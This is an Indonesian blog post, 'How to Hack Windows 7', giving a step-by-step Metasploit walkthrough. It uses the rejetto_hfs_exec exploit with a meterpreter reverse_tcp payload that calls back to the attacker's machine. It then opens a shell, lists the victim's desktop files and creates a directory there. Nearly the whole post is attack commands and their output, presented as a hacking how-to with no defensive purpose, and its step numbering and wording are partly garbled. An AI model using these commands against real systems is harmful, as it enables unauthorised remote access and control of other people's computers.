Minggu, 06 September 2015

HOW TO HACK WINDOWS 7

1 OPEN TERMINAL

┌─[✗]─[root@parrot]─[/home/budhya]
└──╼ #msfconsole
msf > use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) >


3 set PAYLOAD windows/meterpreter/reverse_tcp
show options

 
4 msf exploit(rejetto_hfs_exec) > set RHOST (192.168.1.102) ip target
RHOST => 192.168.1.102

5 msf exploit(rejetto_hfs_exec) > set SRVHOST 192.168.1.110 ( IP KITA)
SRVHOST => 192.168.1.110

 
6 msf exploit(rejetto_hfs_exec) > set LHOST 192.168.1.110
LHOST => 192.168.1.110

 
7 msf exploit(rejetto_hfs_exec) > set LPORT 4444
LPORT => 4444

8 msf exploit(rejetto_hfs_exec) > exploit

 
9 meterpreter > shell
Process 3180 created.
Channel 2 created.
 
10 netx for loking diterc tory




meterpreter > ls
Listing: C:\Users\monyonk\Desktop
=================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2015-09-06 22:26:18 +0700 %TEMP%
100666/rw-rw-rw- 26125 fil 2015-09-02 20:50:05 +0700 Generate-Macro.ps1
100666/rw-rw-rw- 1436 fil 2015-09-02 21:13:02 +0700 RegistryCleanup.ps1
100666/rw-rw-rw- 171 fil 2015-09-02 21:11:47 +0700 SchTaskCleanup.ps1
40777/rwxrwxrwx 0 dir 2015-08-27 17:52:27 +0700 darkcomet 5.3.1
100666/rw-rw-rw- 282 fil 2014-12-30 01:27:27 +0700 desktop.ini
40777/rwxrwxrwx 0 dir 2015-09-06 22:08:57 +0700 egy.txt
40777/rwxrwxrwx 0 dir 2015-09-06 22:09:15 +0700 egywashere
40777/rwxrwxrwx 0 dir 2015-09-06 22:12:49 +0700 egyyyyyy
100777/rwxrwxrwx 2498560 fil 2014-08-24 21:18:36 +0700 hfs.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:13:20 +0700 ijinmassayasdhmasuk
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:42 +0700 koramil.exe
40777/rwxrwxrwx 0 dir 2015-09-06 22:25:41 +0700 reky

11 create new file

meterpreter > mkdir jagotarung.exe
Creating directory: jagotarung.exe
 
12 meterpreter >ls

Tidak ada komentar:

Posting Komentar